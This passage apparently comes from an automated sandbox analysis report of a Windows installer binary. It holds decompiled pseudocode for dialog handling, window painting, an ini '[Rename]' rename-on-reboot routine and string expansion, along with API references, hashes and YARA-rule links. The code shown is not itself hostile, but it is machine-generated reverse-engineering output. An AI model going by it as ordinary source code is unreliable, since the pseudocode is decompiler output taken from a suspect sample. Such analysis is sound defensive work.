                                                                                                                          0x00403dfe
                                                                                                                          0x00403e04
                                                                                                                          0x00403e11
                                                                                                                          0x00403e17
                                                                                                                          0x00403e17
                                                                                                                          0x00403e21
                                                                                                                          0x00000000
                                                                                                                          0x00403e21
                                                                                                                          0x004039e6

                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                                                                                                          • ShowWindow.USER32(?), ref: 004039DA
                                                                                                                          • DestroyWindow.USER32 ref: 004039EE
                                                                                                                          • SetWindowLongA.USER32 ref: 00403A0A
                                                                                                                          • GetDlgItem.USER32 ref: 00403A2B
                                                                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A3F
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                                                                                                          • GetDlgItem.USER32 ref: 00403AF4
                                                                                                                          • GetDlgItem.USER32 ref: 00403AFE
                                                                                                                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403B18
                                                                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B69
                                                                                                                          • GetDlgItem.USER32 ref: 00403C0F
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403C30
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403C42
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403C5D
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C73
                                                                                                                          • EnableMenuItem.USER32 ref: 00403C7A
                                                                                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C92
                                                                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CA5
                                                                                                                          • lstrlenA.KERNEL32(00420538,?,00420538,00423740), ref: 00403CCE
                                                                                                                          • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 184305955-0
                                                                                                                          • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                                                                                          • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                                                                                                          • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                                                                                          • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403F9C, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E00403F9C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420518 =  *0x420518 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EBB(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ee0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422ee0
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f48, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420518 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd08 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E76(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404227();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42371c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423f78;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F68;
				E00403E54(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E54(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E76( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E89(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423f50 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4fc =  *0x41f4fc & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420518 =  *0x420518 & 0x00000000;
				return 0;
			}

















                                                                                                                          0x00403fac
                                                                                                                          0x004040d2
                                                                                                                          0x0040412e
                                                                                                                          0x00404132
                                                                                                                          0x00404209
                                                                                                                          0x0040420b
                                                                                                                          0x0040420b
                                                                                                                          0x00404211
                                                                                                                          0x00404211
                                                                                                                          0x00404214
                                                                                                                          0x00000000
                                                                                                                          0x0040421b
                                                                                                                          0x00404140
                                                                                                                          0x00404142
                                                                                                                          0x0040414c
                                                                                                                          0x00404157
                                                                                                                          0x0040415a
                                                                                                                          0x0040415d
                                                                                                                          0x00404168
                                                                                                                          0x0040416b
                                                                                                                          0x00404172
                                                                                                                          0x00404180
                                                                                                                          0x00404198
                                                                                                                          0x004041a0
                                                                                                                          0x004041ab
                                                                                                                          0x004041bb
                                                                                                                          0x004041bd
                                                                                                                          0x004041bd
                                                                                                                          0x00404172
                                                                                                                          0x004041c7
                                                                                                                          0x00000000
                                                                                                                          0x004041d2
                                                                                                                          0x004041d6
                                                                                                                          0x004041e7
                                                                                                                          0x004041e7
                                                                                                                          0x004041ed
                                                                                                                          0x004041fb
                                                                                                                          0x004041fb
                                                                                                                          0x00000000
                                                                                                                          0x004041ff
                                                                                                                          0x004041c7
                                                                                                                          0x004040dd
                                                                                                                          0x00000000
                                                                                                                          0x004040f1
                                                                                                                          0x004040f7
                                                                                                                          0x004040fd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404122
                                                                                                                          0x00404124
                                                                                                                          0x00404129
                                                                                                                          0x00000000
                                                                                                                          0x00404129
                                                                                                                          0x004040dd
                                                                                                                          0x00403fb2
                                                                                                                          0x00403fb5
                                                                                                                          0x00403fba
                                                                                                                          0x00403fcb
                                                                                                                          0x00403fcb
                                                                                                                          0x00403fd2
                                                                                                                          0x00403fd5
                                                                                                                          0x00403fd7
                                                                                                                          0x00403fdc
                                                                                                                          0x00403fe5
                                                                                                                          0x00403feb
                                                                                                                          0x00403ff7
                                                                                                                          0x00403ffa
                                                                                                                          0x00404003
                                                                                                                          0x00404008
                                                                                                                          0x0040400b
                                                                                                                          0x00404010
                                                                                                                          0x00404027
                                                                                                                          0x0040402e
                                                                                                                          0x00404041
                                                                                                                          0x00404044
                                                                                                                          0x00404059
                                                                                                                          0x00404060
                                                                                                                          0x00404065
                                                                                                                          0x0040406a
                                                                                                                          0x0040406a
                                                                                                                          0x00404079
                                                                                                                          0x00404088
                                                                                                                          0x0040408a
                                                                                                                          0x004040a0
                                                                                                                          0x004040af
                                                                                                                          0x004040b1
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404027
                                                                                                                          • GetDlgItem.USER32 ref: 0040403B
                                                                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404059
                                                                                                                          • GetSysColor.USER32(?), ref: 0040406A
                                                                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404079
                                                                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404088
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00404092
                                                                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040A0
                                                                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040AF
                                                                                                                          • GetDlgItem.USER32 ref: 00404112
                                                                                                                          • SendMessageA.USER32(00000000), ref: 00404115
                                                                                                                          • GetDlgItem.USER32 ref: 00404140
                                                                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404180
                                                                                                                          • LoadCursorA.USER32 ref: 0040418F
                                                                                                                          • SetCursor.USER32(00000000), ref: 00404198
                                                                                                                          • ShellExecuteA.SHELL32(0000070B,open,.B,00000000,00000000,00000001), ref: 004041AB
                                                                                                                          • LoadCursorA.USER32 ref: 004041B8
                                                                                                                          • SetCursor.USER32(00000000), ref: 004041BB
                                                                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041E7
                                                                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041FB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                          • String ID: N$open$.B
                                                                                                                          • API String ID: 3615053054-720656042
                                                                                                                          • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                                                                                          • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                                                                                                          • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                                                                                          • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f50;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423740, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423f48;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                                          0x0040100a
                                                                                                                          0x00401039
                                                                                                                          0x00401047
                                                                                                                          0x0040104d
                                                                                                                          0x00401051
                                                                                                                          0x0040105b
                                                                                                                          0x00401061
                                                                                                                          0x00401064
                                                                                                                          0x004010f3
                                                                                                                          0x00401089
                                                                                                                          0x0040108c
                                                                                                                          0x004010a6
                                                                                                                          0x004010bd
                                                                                                                          0x004010cc
                                                                                                                          0x004010cf
                                                                                                                          0x004010d5
                                                                                                                          0x004010d9
                                                                                                                          0x004010e4
                                                                                                                          0x004010ed
                                                                                                                          0x004010ef
                                                                                                                          0x004010ef
                                                                                                                          0x00401100
                                                                                                                          0x00401105
                                                                                                                          0x0040110d
                                                                                                                          0x00401110
                                                                                                                          0x00401112
                                                                                                                          0x00401118
                                                                                                                          0x0040111f
                                                                                                                          0x00401126
                                                                                                                          0x00401130
                                                                                                                          0x00401142
                                                                                                                          0x00401156
                                                                                                                          0x00401160
                                                                                                                          0x00401165
                                                                                                                          0x00401165
                                                                                                                          0x00401110
                                                                                                                          0x0040116e
                                                                                                                          0x00000000
                                                                                                                          0x00401178
                                                                                                                          0x00401010
                                                                                                                          0x00401013
                                                                                                                          0x00401015
                                                                                                                          0x0040101f
                                                                                                                          0x0040101f
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32 ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32 ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextA.USER32(00000000,00423740,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F
                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                          • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                                                                                          • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                                                                                                          • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                                                                                          • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004058E6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E004058E6(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F28(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fd0 =  *0x423fd0 + 1;
						return _t20;
					}
				}
				 *0x4226c8 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422140, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d40, "%s=%s\r\n", 0x4226c8, 0x422140);
						_t56 = _t55 + 0x10;
						E00405BBA(_t43, 0x400, 0x422140, 0x422140,  *((intOrPtr*)( *0x423f50 + 0x128)));
						_t20 = E0040586F(0x422140, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057E4(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057E4(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405830(_t51 + _t29, 0x421d40, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B98(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040586F(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                                                          0x004058ec
                                                                                                                          0x004058f3
                                                                                                                          0x004058f7
                                                                                                                          0x00405900
                                                                                                                          0x00405904
                                                                                                                          0x00405a43
                                                                                                                          0x00405a43
                                                                                                                          0x00000000
                                                                                                                          0x00405a43
                                                                                                                          0x00405904
                                                                                                                          0x00405910
                                                                                                                          0x00405926
                                                                                                                          0x0040594e
                                                                                                                          0x00405959
                                                                                                                          0x0040595d
                                                                                                                          0x0040597d
                                                                                                                          0x00405984
                                                                                                                          0x0040598e
                                                                                                                          0x0040599b
                                                                                                                          0x004059a0
                                                                                                                          0x004059a5
                                                                                                                          0x004059a9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004059b8
                                                                                                                          0x004059ba
                                                                                                                          0x004059c7
                                                                                                                          0x004059cb
                                                                                                                          0x00405a3c
                                                                                                                          0x00405a3d
                                                                                                                          0x00000000
                                                                                                                          0x004059e7
                                                                                                                          0x004059f4
                                                                                                                          0x00405a59
                                                                                                                          0x00405a60
                                                                                                                          0x00405a07
                                                                                                                          0x00405a07
                                                                                                                          0x00405a09
                                                                                                                          0x00405a12
                                                                                                                          0x00405a1d
                                                                                                                          0x00405a2f
                                                                                                                          0x00405a36
                                                                                                                          0x00000000
                                                                                                                          0x00405a36
                                                                                                                          0x00405a62
                                                                                                                          0x00405a63
                                                                                                                          0x00405a68
                                                                                                                          0x00405a6a
                                                                                                                          0x00405a77
                                                                                                                          0x00405a77
                                                                                                                          0x00405a7b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405a6c
                                                                                                                          0x00405a6c
                                                                                                                          0x00405a6f
                                                                                                                          0x00405a72
                                                                                                                          0x00405a73
                                                                                                                          0x00000000
                                                                                                                          0x00405a6c
                                                                                                                          0x004059ff
                                                                                                                          0x00405a04
                                                                                                                          0x00000000
                                                                                                                          0x00405a04
                                                                                                                          0x004059cb
                                                                                                                          0x00405928
                                                                                                                          0x00405933
                                                                                                                          0x0040593c
                                                                                                                          0x00405940
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405940
                                                                                                                          0x00405a4d

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                            • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,0040567B,?,00000000,000000F1,?), ref: 00405933
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 0040593C
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00405959
                                                                                                                          • wsprintfA.USER32 ref: 00405977
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059D7
                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A2F
                                                                                                                          • GlobalFree.KERNEL32 ref: 00405A36
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A3D
                                                                                                                            • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                                                                                            • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                                                          • String ID: %s=%s$@!B$[Rename]
                                                                                                                          • API String ID: 3445103937-2946522640
                                                                                                                          • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                                                                                          • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                                                                                                          • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                                                                                          • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405BBA, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42371c - 4 + _t36 * 4);
				}
				_t74 =  *0x423f78 + _t36;
				_t37 = 0x422ee0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422ee0;
				if(_a4 - 0x422ee0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
